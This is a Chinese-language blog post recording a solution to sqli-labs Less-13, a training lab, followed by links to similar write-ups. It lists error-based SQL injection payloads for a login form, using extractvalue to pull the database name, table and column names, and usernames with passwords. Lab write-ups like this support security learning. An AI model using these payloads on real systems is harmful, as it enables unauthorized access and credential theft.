Sqlilabs Less-13

dofd

已于 2022-03-04 19:52:00 修改

阅读量299

点赞数

分类专栏： Sqlilabs靶场学习记录文章标签： sql php 前端

于 2022-03-04 19:50:46 首次发布

本文链接：https://blog.csdn.net/Light_inthe_eyes/article/details/123283898

版权

Sqlilabs靶场学习记录专栏收录该内容

27 篇文章 0 订阅

订阅专栏

判断是单引号单括号字符型注入，并且成功注入时无回显，所以用报错注入：

uname=admin')&passwd=&submit=Submit

uname=admin')#&passwd=&submit=Submit

在这里插入图片描述判断列数：

uname=admin')+order+by+2#&passwd=&submit=Submit

在这里插入图片描述爆库：

uname=admin')+and+extractvalue(1,concat(0x7e,(select+database())))#&passwd=&submit=Submit

在这里插入图片描述爆表名：

uname=admin')+and+extractvalue(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database())))#&passwd=&submit=Submit

在这里插入图片描述爆列名：

uname=admin')+and+extractvalue(1,concat(0x7e,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='users')))#&passwd=&submit=Submit

在这里插入图片描述爆数据：

uname=admin')+and+extractvalue(1,concat(0x7e,(select+group_concat(username,password)+from+users)))#&passwd=&submit=Submit

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

dofd

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

SQLi LABS Less-20 Cookie注入

wangyuxiang946的博客

06-23

1万+

SQLi第二十关，sqllabs less-20，sqli-labs less20

sqli-labs Less-13

qq_42630215的博客

03-27

180

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1') LIMIT 0,1' at line 1 uname= ') union select count(*),c...

参与评论您还未登录，请先登录后发表或查看评论

sqli-labs/Less-13

m0_71299382的博客

11-18

300

sqli-labs第十三关

sqli-labs ————less -13

Fly_鹏程万里

05-11

1023

Less -13源代码：<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&g..

sqli-labs (less-13)

kukudeshuo的博客

03-09

1060

sqli-labs (less-13) 进入13，输入用户名和密码登入，利用hackbar抓取POST请求，但是这里我们发现屏幕上这次没有数据回显了，这也说明我们这里不能再使用union注入了输入 uname=admin'&passwd=admin&submit=Submit #页面回显错误信息通过报错信息我们知道闭合方式为’)，并且为字符型注入因为这里没有数据回显，但是我们观察到有完整的错误信息，所以这里可以使用Boolean盲注报错注入攻击 Boolean盲注查看当前数据库

sqli labs less 13

Xiaoxiaoqiang_的博客

03-02

156

小学生

网络安全-sqlmap实战之sqlilabs-Less8_sqli-labs-master less-8 select from users where

2401_84254087的博客

05-02

当我学到一定基础，有自己的理解能力的时候，会去阅读一些前辈整理的书籍或者手写的笔记资料，这些笔记详细记载了他们对一些技术点的理解，这些理解是比较独到，可以学到不一样的思路。网安所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。观看零基础学习视频，看视频学习是最快捷也是最有效果的方式，跟着视频中老师的思路，从基础到深入，还是很容易入门的。添加–dbms参数,–technique参数。使用-o参数优化,–batch参数进行跳过。

sqli-labs ----less-26---37--练习

代码审计

03-07

998

sqli-labs————Less-26（绕空格、/*、#等）该关卡提示空格和注释被转义，我们测试一下： http://www.sqli.com/Less-26/?id=1’报错 sqli-labs-master/Less-26/?id=1’ --+ 依旧报错，我添加的注释不见了，应该是注释被转义成了空字符，我们换成;%00测试一下： http://www.sqli.com/Less-26/?id=1%20and%20sleep(4);%00 and应该被转义了 phpstorm

Sqli-labs靶场第9关详解[Sqli-labs-less-9]

m0_73615178的博客

02-24

2013

利用 order by 来测列数测显位：mysql用1,2,3,4Mysql获取相关数据：一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表，列做准备-database()SQL注入-时间型盲注（Time-based blind）

Sqli-labs靶场第11关详解[Sqli-labs-less-11]

m0_73615178的博客

02-24

1545

SQL注入的三个条件：①参数可控；（从参数输入就知道参数可控）②参数过滤不彻底导致恶意代码被执行；（需要在测试过程中判断）③参数带入数据库执行。（从网页功能能大致分析出是否与数据库进行交互）利用 order by 来测列数测显位：mysql用1,2,3,4Mysql获取相关数据：一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-

Sqli-labs之Less-13和Less-14

→_→

04-05

1193

Less-13 POST单引号变形双注入由题意可知，有单引号闭合的问题，所以在输入框中分别输入 1' 和 1，看返回结果：报错，从信息中得知还有一个小括号，测试 1') or 1=1 -- # 登录成功发现不在返回用户名和密码信息。从以上的信息中...

SQLi LABS Less-13 报错注入+布尔盲注